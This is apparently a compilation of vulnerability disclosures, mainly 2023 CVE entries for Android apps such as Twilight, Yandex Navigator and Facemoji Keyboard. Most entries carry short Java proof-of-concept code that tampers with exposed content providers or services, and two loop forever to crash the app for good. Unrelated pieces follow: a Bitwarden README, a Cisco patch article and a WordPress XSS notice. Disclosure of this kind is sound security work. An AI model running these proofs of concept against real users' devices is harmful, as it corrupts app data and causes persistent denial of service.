An issue found in CrossX v.1.15.3 for Android allows a local attacker to cause an escalation of Privileges via the database files.

**Escalation of Privileges exists in CrossX（CVE-2023-29766）**

Vendor: CROSSX SOLUÇÕES MOBILE LTDA(https://appcrossx.com/)

Affected product: CrossX(com.startapps.crossx)

Version: 1.15.3

Download link：https://play.google.com/store/apps/details?id=com.startapps.crossx

Description of the vulnerability for use in the CVE：An issue found in CrossX v.1.15.3 allows a local attacker to cause an escalation of Privileges via the database files.

Additional information: The CrossX application allows unauthorized applications to use the methods provided in its exposed components to modify data in the Database file, which is loaded at application startup and affects critical application functionality. For example, modify the user's personal data, resulting in an escalation of privilege attack.

poc:

 public void attack\_crossx() {
        Uri uri = Uri.parse("content://com.startapps.crossx.contentprovider/tb\_user");
        ContentResolver contentResolver = getApplicationContext().getContentResolver();
            ContentValues contentValues = new ContentValues();
            contentValues.put("email", targetVaule);
            contentResolver.insert(uri, contentValues);
    }

CVE-2023-29766: SO-CVEs/CVE detailed.md at main · LianKee/SO-CVEs

An issue found in Twilight v.13.3 for Android allows unauthorized apps to cause escalation of privilege attacks by manipulating the SharedPreference files.

**Escalation of Privileges exists in Twilight（CVE-2023-29755）**

Vendor: Twilight(http://twilight.urbandroid.org/)

Affected product: Twilight(com.urbandroid.lux)

Version: 13.3

Download link： https://play.google.com/store/apps/details?id=com.urbandroid.lux

Description of the vulnerability for use in the CVE：An issue found in Twilight v.13.3 allows unauthorized apps to cause escalation of privilege attacks by manipulating the SharedPreference files.

Additional information: The Twilight application allows unauthorized applications to use the methods provided in its exposed components to modify data in the SharedPreference file, which is loaded at application startup and affects critical application functionality. Specifically, an attacker is able to change relevant settings in the application by modifying certain key data in the SharedPreference file, such as adjusting the screen brightness, changing the application theme, etc., resulting in an escalation of privilege attack.

poc:

ContentResolver contentResolver = getApplicationContext().getContentResolver();
Uri parse = Uri.parse("content://com.urbandroid.sleep.multiprocesspreferences.PREFFERENCE\_AUTHORITY/a/a");
    ContentValues contentValues = new ContentValues();
//attacker can update any data in sharedpreferences!
    contentValues.put(targetKey,targetValue);
    contentResolver.insert(parse,contentValues);
    System.out.println("输入数据");

CVE-2023-29755: SO-CVEs/CVE detailed.md at main · LianKee/SO-CVEs

An issue found in Twilight v.13.3 for Android allows unauthorized apps to cause a persistent denial of service by manipulating the SharedPreference files.

**Denial of Service exists in Twilight（CVE-2023-29756）**

Vendor: Twilight(http://twilight.urbandroid.org/)

Affected product: Twilight(com.urbandroid.lux)

Version: 13.3

Download link： https://play.google.com/store/apps/details?id=com.urbandroid.lux

Description of the vulnerability for use in the CVE：An issue found in Twilight v.13.3 allows unauthorized apps to cause a persistent denial of service by manipulating the SharedPreference files.

Additional information: The Twilight application allows unauthorized applications to modify the data in its SharedPreference file through the interface provided by the exposed component, which is loaded into memory for use at application startup. Once an attacker injects an excessive amount of data, it triggers an OOM error and crashes, which eventually leads to a persistent denial of service as the data is stored persistently in the SharedPreference file.

poc:

ContentResolver contentResolver = getApplicationContext().getContentResolver();
Uri parse = Uri.parse("content://com.urbandroid.sleep.multiprocesspreferences.PREFFERENCE\_AUTHORITY/a/a");
while(true){
    ContentValues contentValues = new ContentValues();
    String string = getRandomString(10000);
    contentValues.put(string,string);
    contentResolver.insert(parse,contentValues);
}

CVE-2023-29756: SO-CVEs/CVE detailed.md at main · LianKee/SO-CVEs

An issue found in Yandex Navigator v.6.60 for Android allows unauthorized apps to cause escalation of privilege attacks by manipulating the SharedPreference files.

**Escalation of Privileges exists in Yandex Navigator（CVE-2023-29749）**

Vendor: Yandex (https://yandex.com/)

Affected product: Yandex Navigator(ru.yandex.yandexnavi)

Version: 6.60

Download link：https://play.google.com/store/apps/details?id=ru.yandex.yandexnavi&pli=1

Description of the vulnerability for use in the CVE：An issue found in Yandex Navigator v.6.60 allows unauthorized apps to cause escalation of privilege attacks by manipulating the SharedPreference files.

Additional information: The Yandex Navigator application allows unauthorized applications to modify the data in its SharedPreference file, which is loaded into memory for use at application startup, thus affecting the implementation of certain features of the application. For example, an attacker can modify the "notification-enabled" value in the ru.yandex.yandexnavi.preferences.xml file through the interface provided in the exposed components of the Yandex Navigator application. This can turn off the search box in the notification bar of the application, affecting the normal functionality of the application and causing an escalation of privilege attack. In fact, attacker can insert data into any SharedPreferences file whose name start with 'ru.yandex.yandexnavi.', like 'ru.yandex.yandexnavi.ui.PermissionDelegateImpl.PREFERENCES' . In fact, I found that there are many SharedPreferences files like this and they store a lot of important data.

poc：

public void attack\_ru() {
        ComponentName componentName = new ComponentName("ru.yandex.yandexnavi", "ru.yandex.common.clid.ClidService");
        Intent intent = new Intent();
        intent.setComponent(componentName);
        intent.putExtra("service\_version", 0);
        intent.setAction("ru.yandex.common.clid.update\_preferences");
        intent.putExtra("preferences", "ui.PermissionDelegateImpl.PREFERENCES");
        intent.putExtra("application", "ru.yandex.yandexnavi");
        Bundle bundle = new Bundle();
        Bundle bundle2 = new Bundle();
        Bundle bundle3 = new Bundle();
        bundle2.putBoolean("MICROPHONE", false);
        long time = 1657202353619L;
        bundle3.putLong("MICROPHONE", time);
        bundle.putBundle("bundle-values", bundle2);
        bundle.putBundle("bundle-time", bundle3);
        intent.putExtra("bundle", bundle);
        ServiceConnection connection = new ServiceConnection() {
            @Override
            public void onServiceConnected(ComponentName name, IBinder service) {
            }
            @Override
            public void onServiceDisconnected(ComponentName name) {
            }
        };
        bindService(intent, connection, BIND\_AUTO\_CREATE);
    }

CVE-2023-29749: SO-CVEs/CVE detailed.md at main · LianKee/SO-CVEs

An issue found in Facemoji Emoji Keyboard v.2.9.1.2 for Android allows unauthorized apps to cause escalation of privilege attacks by manipulating the component.

**Escalation of Privileges exists in Facemoji Emoji Keyboard（CVE-2023-29752）**

Vendor: EKATOX APPS(https://www.facemojikeyboard.com/)

Affected product: Facemoji Emoji Keyboard(com.simejikeyboard)

Version: 2.9.1.2

Download link：https://play.google.com/store/apps/details?id=com.simejikeyboard

Description of the vulnerability for use in the CVE：An issue found in Facemoji Emoji Keyboard v.2.9.1.2 allows unauthorized apps to cause escalation of privilege attacks by manipulating the component.

Additional information: The Facemoji Emoji Keyboard application allows unauthorized applications to use the methods provided in its exposed components to modify data in the SharedPreference file, which is loaded at application launch and affects critical application functionality. Specifically, an attacker is able to modify the data in the profile\_enable\_subtype.xml file by constructing an intent carrying malicious data. When the key\_enable\_subtype field is modified to an arbitrary string, the virtual keyboard that comes with this application will not be able to output any characters. More seriously, when the key\_enable\_subtype and key\_subtype\_enable\_layout fields are modified to any string at the same time, the virtual keyboard will not pop up when any input box is clicked, and the application will keep reporting errors, leading to escalation of privilege attacks.

poc:

  public void attack\_keybord(){
        ContentResolver contentResolver = getApplicationContext().getContentResolver();
        Uri uri = Uri.parse("content://com.simejikeyboard.dprefrenceprovider/string/profile\_enable\_subtype/xxx");
            ContentValues contentValues = new ContentValues();
            String randomString = getRandomString(10240);
            contentValues.put("key","key\_enable\_subtype");
            contentValues.put("value",randomString);
            contentResolver.insert(uri,contentValues);
    }

CVE-2023-29752: SO-CVEs/CVE detailed.md at main · LianKee/SO-CVEs

An issue found in Blue Light Filter v.1.5.5 for Android allows unauthorized apps to cause escalation of privilege attacks by manipulating the SharedPreference files.

**Escalation of Privileges exists in Blue Light Filter（CVE-2023-29757）**

Vendor: Leap Fitness Group(https://leap.app/)

Affected product: Blue Light Filter(com.eyefilter.nightmode.bluelightfilter)

Version: 1.5.5

Download link： https://play.google.com/store/apps/details?id=com.eyefilter.nightmode.bluelightfilter

Description of the vulnerability for use in the CVE：An issue found in Blue Light Filter v.1.5.5 allows unauthorized apps to cause escalation of privilege attacks by manipulating the SharedPreference files.

Additional information: The Blue Light Filter application allows unauthorized applications to use the methods provided in its exposed components to modify data in the SharedPreference file, which is loaded at application startup and affects critical application functionality. Specifically, an attacker is able to change the application's color temperature by modifying the current\_ct field in the SharedPreference file, causing the phone to display abnormally and resulting in an elevation of privilege attack.

poc:

 public void attack\_eye() {
        ContentResolver contentResolver = getContentResolver();
        ContentValues contentValues = new ContentValues();
        Uri uri = Uri.parse("content://com.eyefilter.nightmode.bluelightfilter.PREFFERENCE\_AUTHORITY/a/a");
        contentValues.put("dim", 50);
        contentValues.put("filter\_capacity", 100000);
        contentValues.put("language\_index", -1);//设置语言
        contentValues.put("current\_ct", 600);//设置当前色温
        contentResolver.insert(uri, contentValues);
    }

CVE-2023-29757: SO-CVEs/CVE detailed.md at main · LianKee/SO-CVEs

An issue found in Blue Light Filter v.1.5.5 for Android allows unauthorized apps to cause a persistent denial of service by manipulating the SharedPreference files.

**Denial of Service exists in Blue Light Filter（CVE-2023-29758）**

Vendor: Leap Fitness Group(https://leap.app/)

Affected product: Blue Light Filter(com.eyefilter.nightmode.bluelightfilter)

Version: 1.5.5

Download link： https://play.google.com/store/apps/details?id=com.eyefilter.nightmode.bluelightfilter

Description of the vulnerability for use in the CVE：An issue found in Blue Light Filter v.1.5.5 allows unauthorized apps to cause a persistent denial of service by manipulating the SharedPreference files.

Additional information: The Blue Light Filter application allows unauthorized applications to modify the data in its SharedPreference file through the interface provided by the exposed component, which is loaded into memory for use at application startup. Once an attacker injects an excessive amount of data, it triggers an OOM error and crashes, which eventually leads to a persistent denial of service as the data is stored persistently in the SharedPreference file.

poc:

 public void attack\_eye() {
        while(true) {
            ContentResolver contentResolver = getContentResolver();
            ContentValues contentValues = new ContentValues();
            Uri uri = Uri.parse("content://com.eyefilter.nightmode.bluelightfilter.PREFFERENCE\_AUTHORITY/a/a");
            String randomString = getRandomString(1000);
            contentValues.put(randomString,randomString);
            contentResolver.insert(uri, contentValues);
        }
    }

CVE-2023-29758: SO-CVEs/CVE detailed.md at main · LianKee/SO-CVEs

Bitwarden Desktop v1.20.0 and above stores the biometric key in plaintext which allows a local attacker to decrypt the entire local vault.

    

**Bitwarden Client Applications**

This repository houses all Bitwarden client applications except the Mobile application.

Please refer to the Clients section of the Contributing Documentation for build instructions, recommended tooling, code style tips, and lots of other great information to get you started.

**Related projects:**

*   bitwarden/server: The core infrastructure backend (API, database, Docker, etc).
*   bitwarden/mobile: The mobile app vault (iOS and Android).
*   bitwarden/directory-connector: A tool for syncing a directory (AD, LDAP, Azure, G Suite, Okta) to an organization.

**We're Hiring!**

Interested in contributing in a big way? Consider joining our team! We're hiring for many positions. Please take a look at our Careers page to see what opportunities are currently open as well as what it's like to work at Bitwarden.

**Contribute**

Code contributions are welcome! Please commit any pull requests against the master branch. Learn more about how to contribute by reading the Contributing Guidelines. Check out the Contributing Documentation for how to get started with your first contribution.

Security audits and feedback are welcome. Please open an issue or email us privately if the report is sensitive in nature. You can read our security policy in the SECURITY.md file.

CVE-2023-27706: GitHub - bitwarden/clients: Bitwarden client applications (web, browser extension, desktop, and cli)

Categories: Exploits and vulnerabilities
Categories: News
Tags: Cisco

Tags:  anyconnect

Tags:  system secure client

Tags:  VPN

Tags:  bug

Tags:  patch

Tags:  update

Tags:  vulnerability

Tags:  SYSTEM

We take a look at a recent update for Cisco Secure System Client and why you should apply the update as soon as possible.



(Read more...)




The post Update your Cisco System Secure Client now to fix this AnyConnect bug appeared first on Malwarebytes Labs.

Cisco Secure Client is the fresh recipient of a fix to address a high-severity vulnerability related to improper permissions. The flaw allows attackers to potentially escalate privileges to the SYSTEM account.

From the vulnerability advisory:

> A vulnerability in the client update feature of Cisco AnyConnect Secure Mobility Client Software for Windows and Cisco Secure Client Software for Windows could allow a low-privileged, authenticated, local attacker to elevate privileges to those of SYSTEM.
> 
> This vulnerability exists because improper permissions are assigned to a temporary directory that is created during the upgrade process. An attacker could exploit this vulnerability by abusing a specific function of the Windows installer process. A successful exploit could allow the attacker to execute code with SYSTEM privileges.

As Bleeping Computer notes, Secure Client allows for remote work thanks to a secure Virtual Private Network and also gives admins telemetry and endpoint management functionality. The attacks themselves do not need user interaction to get the exploitation ball rolling. Bleeping Computer also mentions that there is no current evidence to suggest active exploitation in the wild. With this in mind, there’s never been a better time to start patching. 

As with so many other vulnerabilities out there, there is no workaround for this issue. What this means is that if you’re delayed applying an update for whatever reason, there’s no way to put a band-aid over the wound until you’re ready to hit the update button. Your setup will simply remain at risk until you do it.

The vulnerable products are as follows:

> Cisco AnyConnect Secure Mobility Client Software for Windows and Cisco Secure Client Software for Windows.
> 
> Note: For releases earlier than Release 5.0, Cisco Secure Client for Windows is known as Cisco AnyConnect Secure Mobility Client for Windows.

There’s a number of products not at risk from this issue, which are listed below. You’ll note that none of them are Windows.

*   Cisco AnyConnect Secure Mobility Client for Linux
*   Cisco AnyConnect Secure Mobility Client for MacOS
*   Cisco Secure Client-AnyConnect for Android
*   Cisco Secure Client AnyConnect VPN for iOS
*   Cisco Secure Client for Linux
*   Cisco Secure Client for MacOS

This issue has been resolved with the release of Cisco Secure Client for Windows 5.0MR2, and AnyCOnnect Secure Mobility Client for Windows 4.10MR7. If you haven’t already done so, it’s time to check out the Cisco downloads page and make your network a little bit safer.

Malwarebytes EDR and MDR removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

Update your Cisco System Secure Client now to fix this AnyConnect bug

The Metform Elementor Contact Form Builder for WordPress is vulnerable to Cross-Site Scripting by using the 'mf_first_name' shortcode to echo unescaped form submissions in versions up to, and including, 3.3.0. This allows authenticated attackers, with contributor-level permissions or above, to inject arbitrary web scripts in pages that will execute when the victim visits a a page containing the shortcode when the submission id is present in the query string. Note that getting the JavaScript to execute requires user interaction as the victim must visit a crafted link with the form entry id, but the script itself is stored in the site database.

Tag

#android